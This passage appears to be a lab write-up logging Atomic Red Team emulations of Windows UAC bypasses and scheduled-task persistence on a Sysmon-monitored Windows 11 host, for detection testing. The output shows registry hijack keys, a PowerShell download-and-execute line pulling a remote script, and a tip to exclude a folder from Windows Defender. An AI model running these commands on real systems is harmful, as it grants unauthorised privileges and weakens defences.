UAC Bypass with WSReset Registry Modification T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key T1548.002-25 Disable UAC notification via registry keys T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys ```

Check/Get prerequisites of a technique

``` PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1548.002 -CheckPrereqs PathToAtomicsFolder = C:\AtomicRedTeam\atomics CheckPrereq's for: T1548.002-1 Bypass UAC using Event Viewer (cmd Prerequisites met: T1548.002-1 Bypass UAC using Event Viewer (cmd CheckPrereq's for: T1548.002-2 Bypass UAC using Event Viewer (PowerShell Prerequisites met: T1548.002-2 Bypass UAC using Event Viewer (PowerShell CheckPrereq's for: T1548.002-3 Bypass UAC using Fodhelper Prerequisites met: T1548.002-3 Bypass UAC using Fodhelper CheckPrereq's for: T1548.002-4 Bypass UAC using Fodhelper - PowerShell Prerequisites met: T1548.002-4 Bypass UAC using Fodhelper - PowerShell CheckPrereq's for: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell Prerequisites met: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell CheckPrereq's for: T1548.002-6 Bypass UAC by Mocking Trusted Directories Prerequisites met: T1548.002-6 Bypass UAC by Mocking Trusted Directories CheckPrereq's for: T1548.002-7 Bypass UAC using sdclt DelegateExecute Prerequisites met: T1548.002-7 Bypass UAC using sdclt DelegateExecute CheckPrereq's for: T1548.002-8 Disable UAC using reg.exe Prerequisites met: T1548.002-8 Disable UAC using reg.exe CheckPrereq's for: T1548.002-9 Bypass UAC using SilentCleanup task Prerequisites met: T1548.002-9 Bypass UAC using SilentCleanup task CheckPrereq's for: T1548.002-10 UACME Bypass Method 23 Prerequisites not met: T1548.002-10 UACME Bypass Method 23 [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\23 Akagi64.exe") Try installing prereq's with the -GetPrereqs switch CheckPrereq's for: T1548.002-11 UACME Bypass Method 31 Prerequisites not met: T1548.002-11 UACME Bypass Method 31 [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\31 Akagi64.exe") Try installing prereq's with the -GetPrereqs switch CheckPrereq's for: T1548.002-12 UACME Bypass Method 33 Prerequisites not met: T1548.002-12 UACME Bypass Method 33 [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe") Try installing prereq's with the -GetPrereqs switch CheckPrereq's for: T1548.002-13 UACME Bypass Method 34 Prerequisites not met: T1548.002-13 UACME Bypass Method 34 [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\34 Akagi64.exe") Try installing prereq's with the -GetPrereqs switch CheckPrereq's for: T1548.002-14 UACME Bypass Method 39 Prerequisites not met: T1548.002-14 UACME Bypass Method 39 [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\39 Akagi64.exe") Try installing prereq's with the -GetPrereqs switch CheckPrereq's for: T1548.002-15 UACME Bypass Method 56 Prerequisites not met: T1548.002-15 UACME Bypass Method 56 [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe") Try installing prereq's with the -GetPrereqs switch CheckPrereq's for: T1548.002-16 UACME Bypass Method 59 Prerequisites not met: T1548.002-16 UACME Bypass Method 59 [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\59 Akagi64.exe") Try installing prereq's with the -GetPrereqs switch CheckPrereq's for: T1548.002-17 UACME Bypass Method 61 Prerequisites not met: T1548.002-17 UACME Bypass Method 61 [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\61 Akagi64.exe") Try installing prereq's with the -GetPrereqs switch CheckPrereq's for: T1548.002-18 WinPwn - UAC Magic Prerequisites met: T1548.002-18 WinPwn - UAC Magic CheckPrereq's for: T1548.002-19 WinPwn - UAC Bypass ccmstp technique Prerequisites met: T1548.002-19 WinPwn - UAC Bypass ccmstp technique CheckPrereq's for: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique Prerequisites met: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique CheckPrereq's for: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique Prerequisites met: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique CheckPrereq's for: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key Prerequisites met: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key CheckPrereq's for: T1548.002-23 UAC Bypass with WSReset Registry Modification Prerequisites met: T1548.002-23 UAC Bypass with WSReset Registry Modification CheckPrereq's for: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key Prerequisites met: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key CheckPrereq's for: T1548.002-25 Disable UAC notification via registry keys Prerequisites met: T1548.002-25 Disable UAC notification via registry keys CheckPrereq's for: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys Prerequisites met: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1548.002 -GetPrereqs PathToAtomicsFolder = C:\AtomicRedTeam\atomics GetPrereq's for: T1548.002-1 Bypass UAC using Event Viewer (cmd No Preqs Defined GetPrereq's for: T1548.002-2 Bypass UAC using Event Viewer (PowerShell No Preqs Defined GetPrereq's for: T1548.002-3 Bypass UAC using Fodhelper No Preqs Defined GetPrereq's for: T1548.002-4 Bypass UAC using Fodhelper - PowerShell No Preqs Defined GetPrereq's for: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell No Preqs Defined GetPrereq's for: T1548.002-6 Bypass UAC by Mocking Trusted Directories No Preqs Defined GetPrereq's for: T1548.002-7 Bypass UAC using sdclt DelegateExecute No Preqs Defined GetPrereq's for: T1548.002-8 Disable UAC using reg.exe No Preqs Defined GetPrereq's for: T1548.002-9 Bypass UAC using SilentCleanup task No Preqs Defined GetPrereq's for: T1548.002-10 UACME Bypass Method 23 Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\23 Akagi64.exe") Prereq successfully met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\23 Akagi64.exe") GetPrereq's for: T1548.002-11 UACME Bypass Method 31 Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\31 Akagi64.exe") Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\31 Akagi64.exe") GetPrereq's for: T1548.002-12 UACME Bypass Method 33 Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe") Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe") GetPrereq's for: T1548.002-13 UACME Bypass Method 34 Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\34 Akagi64.exe") Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\34 Akagi64.exe") GetPrereq's for: T1548.002-14 UACME Bypass Method 39 Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\39 Akagi64.exe") Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\39 Akagi64.exe") GetPrereq's for: T1548.002-15 UACME Bypass Method 56 Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe") Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe") GetPrereq's for: T1548.002-16 UACME Bypass Method 59 Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\59 Akagi64.exe") Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\59 Akagi64.exe") GetPrereq's for: T1548.002-17 UACME Bypass Method 61 Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\61 Akagi64.exe") Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\61 Akagi64.exe") GetPrereq's for: T1548.002-18 WinPwn - UAC Magic No Preqs Defined GetPrereq's for: T1548.002-19 WinPwn - UAC Bypass ccmstp technique No Preqs Defined GetPrereq's for: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique No Preqs Defined GetPrereq's for: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique No Preqs Defined GetPrereq's for: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key No Preqs Defined GetPrereq's for: T1548.002-23 UAC Bypass with WSReset Registry Modification No Preqs Defined GetPrereq's for: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key No Preqs Defined GetPrereq's for: T1548.002-25 Disable UAC notification via registry keys No Preqs Defined GetPrereq's for: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys No Preqs Defined ```

Run the test for a particular technique

```console PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1548.002 PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd) Process Timed out after 120 seconds, use '-TimeoutSeconds' to specify a different timeout The operation completed successfully. Microsoft Windows [Version 10.0.22631.3155] (c) Microsoft Corporation. All rights reserved. C:\Users\vagrant\AppData\Local\Temp> Exit code: 0 Done executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd) Executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) Hive: HKEY_CURRENT_USER\software\classes\mscfile\shell\open Name Property ---- -------- command Exit code: 0 Done executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) Executing test: T1548.002-3 Bypass UAC using Fodhelper Exception calling "Start" with "0" argument(s): "Access is denied" At C:\AtomicRedTeam\invoke-atomicredteam\Private\Invoke-Process.ps1:45 char:17 + $process.Start() > $null + ~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : Win32Exception Exit code: Done executing test: T1548.002-3 Bypass UAC using Fodhelper Executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open Name Property ---- -------- command DelegateExecute : PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open PSChildName : command PSDrive : HKCU PSProvider : Microsoft.PowerShell.Core\Registry Exit code: 0 Done executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell Executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open Name Property ---- -------- command DelegateExecute : PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open PSChildName : command PSDrive : HKCU PSProvider : Microsoft.PowerShell.Core\Registry Exit code: 0 Done executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) Executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories 1 file(s) copied. symbolic link created for c:\testbypass.exe <<===>> \\?\C:\Windows \System32\mmc.exe Exit code: 0 Done executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories Executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute Hive: HKEY_CURRENT_USER\Software\Classes\Folder\shell\open Name Property ---- -------- command (default) : cmd.exe /c notepad.exe DelegateExecute : PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\Folder\shell\open PSChildName : command PSDrive : HKCU PSProvider : Microsoft.PowerShell.Core\Registry Exit code: 0 Done executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute Executing test: T1548.002-8 Disable UAC using reg.exe The operation completed successfully. Exit code: 0 Done executing test: T1548.002-8 Disable UAC using reg.exe Executing test: T1548.002-9 Bypass UAC using SilentCleanup task The screen cannot be set to the number of lines and columns specified. The operation completed successfully. Access is denied. Exit code: 0 Done executing test: T1548.002-9 Bypass UAC using SilentCleanup task Executing test: T1548.002-10 UACME Bypass Method 23 Exit code: 1073741845 Done executing test: T1548.002-10 UACME Bypass Method 23 Executing test: T1548.002-11 UACME Bypass Method 31 Exit code: 1073741845 Done executing test: T1548.002-11 UACME Bypass Method 31 Executing test: T1548.002-12 UACME Bypass Method 33 Exit code: 1073741845 Done executing test: T1548.002-12 UACME Bypass Method 33 Executing test: T1548.002-13 UACME Bypass Method 34 Exit code: 1073741845 Done executing test: T1548.002-13 UACME Bypass Method 34 Executing test: T1548.002-14 UACME Bypass Method 39 Exit code: 1073741845 Done executing test: T1548.002-14 UACME Bypass Method 39 Executing test: T1548.002-15 UACME Bypass Method 56 Exit code: 1073741845 Done executing test: T1548.002-15 UACME Bypass Method 56 Executing test: T1548.002-16 UACME Bypass Method 59 Exit code: 1073741845 Done executing test: T1548.002-16 UACME Bypass Method 59 Executing test: T1548.002-17 UACME Bypass Method 61 Exit code: 1073741845 Done executing test: T1548.002-17 UACME Bypass Method 61 Executing test: T1548.002-18 WinPwn - UAC Magic iex : At line:1 char:1 + # Global TLS Setting for all functions. If TLS12 isn't suppported yo ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software. At line:2 char:1 + iex(new-object net.webclient).downloadstring('https://raw.githubuserc ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand UACBypass : The term 'UACBypass' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. + UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -tec ... + ~~~~~~~~~ + CategoryInfo : ObjectNotFound: (UACBypass:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException At line:3 char:1 Exit code: 0 Done executing test: T1548.002-18 WinPwn - UAC Magic Executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique iex : At line:1 char:1 + # Global TLS Setting for all functions. If TLS12 isn't suppported yo ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ At line:2 char:1 + iex(new-object net.webclient).downloadstring('https://raw.githubuserc ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand UACBypass : The term 'UACBypass' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:3 char:1 + UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -te ... + ~~~~~~~~~ + CategoryInfo : ObjectNotFound: (UACBypass:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException This script contains malicious content and has been blocked by your antivirus software. Exit code: 0 Done executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique Executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique iex : At line:1 char:1 + # Global TLS Setting for all functions. If TLS12 isn't suppported yo ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software. At line:2 char:1 + iex(new-object net.webclient).downloadstring('https://raw.githubuserc ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand UACBypass : The term 'UACBypass' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:3 char:1 + UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -tec ... + ~~~~~~~~~ + CategoryInfo : ObjectNotFound: (UACBypass:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException Exit code: 0 Done executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique Executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique iex : At line:1 char:1 + function dccuacbypass + ~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software. At line:1 char:4 + & {iex(new-object net.webclient).downloadstring('https://raw.githubus ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand Exit code: 0 Done executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique Executing test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key Exit code: 0 Done executing test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key Executing test: T1548.002-23 UAC Bypass with WSReset Registry Modification Exit code: 0 Done executing test: T1548.002-23 UAC Bypass with WSReset Registry Modification Executing test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key Exit code: 0 Done executing test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key Executing test: T1548.002-25 Disable UAC notification via registry keys The operation completed successfully. Exit code: 0 Done executing test: T1548.002-25 Disable UAC notification via registry keys Executing test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys The operation completed successfully. Exit code: 0 Done executing test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys ```

Clean-up on completion of the test

```console PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1548.002 -Cleanup PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd) Done executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd) Executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) Done executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) Executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper Done executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper Executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell Done executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell Executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) Done executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) Executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories Done executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories Executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute Done executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute Executing cleanup for test: T1548.002-8 Disable UAC using reg.exe The operation completed successfully. Done executing cleanup for test: T1548.002-8 Disable UAC using reg.exe Executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task Done executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task Executing cleanup for test: T1548.002-10 UACME Bypass Method 23 Done executing cleanup for test: T1548.002-10 UACME Bypass Method 23 Executing cleanup for test: T1548.002-11 UACME Bypass Method 31 Done executing cleanup for test: T1548.002-11 UACME Bypass Method 31 Executing cleanup for test: T1548.002-12 UACME Bypass Method 33 Done executing cleanup for test: T1548.002-12 UACME Bypass Method 33 Executing cleanup for test: T1548.002-13 UACME Bypass Method 34 Done executing cleanup for test: T1548.002-13 UACME Bypass Method 34 Executing cleanup for test: T1548.002-14 UACME Bypass Method 39 Done executing cleanup for test: T1548.002-14 UACME Bypass Method 39 Executing cleanup for test: T1548.002-15 UACME Bypass Method 56 Done executing cleanup for test: T1548.002-15 UACME Bypass Method 56 Executing cleanup for test: T1548.002-16 UACME Bypass Method 59 Done executing cleanup for test: T1548.002-16 UACME Bypass Method 59 Executing cleanup for test: T1548.002-17 UACME Bypass Method 61 Done executing cleanup for test: T1548.002-17 UACME Bypass Method 61 Executing cleanup for test: T1548.002-18 WinPwn - UAC Magic Done executing cleanup for test: T1548.002-18 WinPwn - UAC Magic Executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique Done executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique Executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique Done executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique Executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique Done executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique Executing cleanup for test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key Done executing cleanup for test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key Executing cleanup for test: T1548.002-23 UAC Bypass with WSReset Registry Modification Done executing cleanup for test: T1548.002-23 UAC Bypass with WSReset Registry Modification Executing cleanup for test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key Done executing cleanup for test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key Executing cleanup for test: T1548.002-25 Disable UAC notification via registry keys The operation completed successfully. Done executing cleanup for test: T1548.002-25 Disable UAC notification via registry keys Executing cleanup for test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys The operation completed successfully. Done executing cleanup for test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys ```

Attack emulation with ART [Agent windows 11] 🟢

T1053.005 – Scheduled Task/Job

GetPrereqs

```console PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1053.005 -GetPrereqs PathToAtomicsFolder = C:\AtomicRedTeam\atomics GetPrereq's for: T1053.005-1 Scheduled Task Startup Script No Preqs Defined GetPrereq's for: T1053.005-2 Scheduled task Local No Preqs Defined GetPrereq's for: T1053.005-3 Scheduled task Remote No Preqs Defined GetPrereq's for: T1053.005-4 Powershell Cmdlet Scheduled Task No Preqs Defined GetPrereq's for: T1053.005-5 Task Scheduler via VBA Attempting to satisfy prereq: Microsoft Word must be installed You will need to install Microsoft Word manually to meet this requirement Failed to meet prereq: Microsoft Word must be installed GetPrereq's for: T1053.005-6 WMI Invoke-CimMethod Scheduled Task Attempting to satisfy prereq: File to copy must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1053.005\src\T1053_005_WMI.xml) Prereq already met: File to copy must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1053.005\src\T1053_005_WMI.xml GetPrereq's for: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry No Preqs Defined GetPrereq's for: T1053.005-8 Import XML Schedule Task with Hidden Attribute Attempting to satisfy prereq: File to copy must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml) Prereq already met: File to copy must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml) GetPrereq's for: T1053.005-9 PowerShell Modify A Scheduled Task No Preqs Defined GetPrereq's for: T1053.005-10 Scheduled Task ("Ghost Task") via Registry Key Manipulation Attempting to satisfy prereq: PsExec tool from Sysinternals must exist in the ExternalPayloads directory Prereq successfully met: PsExec tool from Sysinternals must exist in the ExternalPayloads directory Attempting to satisfy prereq: GhostTask.exe tool from netero101 must exist in the ExternalPayloads directory. This tool may be quarantined by windows defender; disable windows defender real-time protection to fix it or add the ExternalPayloads directory as an exclusion, using a command like `Add-MpPreference -ExclusionPath "C:\AtomicRedTeam\atomics\..\ExternalPayloads\"` Prereq successfully met: GhostTask.exe tool from netero101 must exist in the ExternalPayloads directory. This tool may be quarantined by windows defender; disable windows defender real-time protection to fix it or add the ExternalPayloads directory as an exclusion, using a command like `Add-MpPreference -ExclusionPath "C:\AtomicRedTeam\atomics\..\ExternalPayloads\"` ```

Test run

```console PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1053.005 PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing test: T1053.005-1 Scheduled Task Startup Script SUCCESS: The scheduled task "T1053_005_OnLogon" has successfully been created. SUCCESS: The scheduled task "T1053_005_OnStartup" has successfully been created. Exit code: 0 Done executing test: T1053.005-1 Scheduled Task Startup Script Executing test: T1053.005-2 Scheduled task Local SUCCESS: The scheduled task "spawn" has successfully been created. Exit code: 0 Done executing test: T1053.005-2 Scheduled task Local Executing test: T1053.005-3 Scheduled task Remote ERROR: No mapping between account names and security IDs was done. Exit code: 1 Done executing test: T1053.005-3 Scheduled task Remote Executing test: T1053.005-4 Powershell Cmdlet Scheduled Task TaskPath TaskName State -------- -------- ----- \ AtomicTask Ready Exit code: 0 Done executing test: T1053.005-4 Powershell Cmdlet Scheduled Task Executing test: T1053.005-5 Task Scheduler via VBA New-Object : Retrieving the COM class factory for component with CLSID {00000000-0000-0000-0000-000000000000} failed due to the following error: 80040154 Class not registered (Exception from HRESULT: 0x80040154 (REGDB_E_CLASSNOTREG)). At line:70 char:12 + $app = New-Object -ComObject "$officeProduct.Application" + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ResourceUnavailable: (:) [New-Object], COMException + FullyQualifiedErrorId : NoCOMClassIdentified,Microsoft.PowerShell.Commands.NewObjectCommand New-Item : The registry key at the specified path does not exist. At line:73 char:34 + if (-not (Test-Path $key)) { New-Item $Key } + CategoryInfo : InvalidArgument: (HKEY_CURRENT_US...oft\Office\Word:String) [New-Item], ArgumentExceptio n + FullyQualifiedErrorId : System.ArgumentException,Microsoft.PowerShell.Commands.NewItemCommand + ~~~~~~~~~~~~~ At line:74 char:5 Set-ItemProperty : Cannot find path 'HKCU:\Software\Microsoft\Office\Word\Security\' because it does not exist. + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (HKCU:\Software\...\Word\Security\:String) [Set-ItemProperty], ItemNotFo undException + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetItemPropertyCommand You cannot call a method on a null-valued expression. At line:84 char:9 + Set-ItemProperty -Path $Key -Name 'AccessVBOM' -Value 1 + $doc = $app.Documents.Add() + ~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull You cannot call a method on a null-valued expression. At line:89 char:5 + $comp = $doc.VBProject.VBComponents.Add(1) + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull You cannot call a method on a null-valued expression. At line:90 char:5 + $comp.CodeModule.AddFromString($macroCode) + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull You cannot call a method on a null-valued expression. At line:91 char:5 + $app.Run($sub) + ~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull You cannot call a method on a null-valued expression. At line:92 char:5 + $doc.Close(0) + ~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull You cannot call a method on a null-valued expression. + $app.Quit() + ~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull Exception calling "ReleaseComObject" with "1" argument(s): "Object reference not set to an instance of an object." At line:93 char:5 At line:94 char:5 + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($comp) ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : NullReferenceException Exception calling 